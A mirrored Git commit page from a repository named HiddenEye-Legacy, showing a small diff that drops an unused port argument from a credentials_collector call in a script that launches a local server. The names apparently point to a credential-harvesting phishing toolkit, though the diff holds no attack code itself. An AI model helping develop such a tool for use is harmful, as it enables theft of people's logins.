mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Removed "port" from credentials_collector because it's not used
This commit is contained in:
parent
6a963786f3
commit
c1d17b15e2
|
@ -48,7 +48,7 @@ if __name__ == "__main__":
|
||||||
server_runner.server_selection(port)
|
server_runner.server_selection(port)
|
||||||
|
|
||||||
multiprocessing.Process(target=server_runner.start_server, args=(port,)).start()
|
multiprocessing.Process(target=server_runner.start_server, args=(port,)).start()
|
||||||
simple_informant.credentials_collector(port)
|
simple_informant.credentials_collector()
|
||||||
|
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
port = '8080' # When Keyword Interrupt Occurs before defining Port by User. Script will use 8080 port.(Just To Remove Exception Errors)
|
port = '8080' # When Keyword Interrupt Occurs before defining Port by User. Script will use 8080 port.(Just To Remove Exception Errors)
|
||||||
|
|
Loading…
Reference in New Issue
Block a user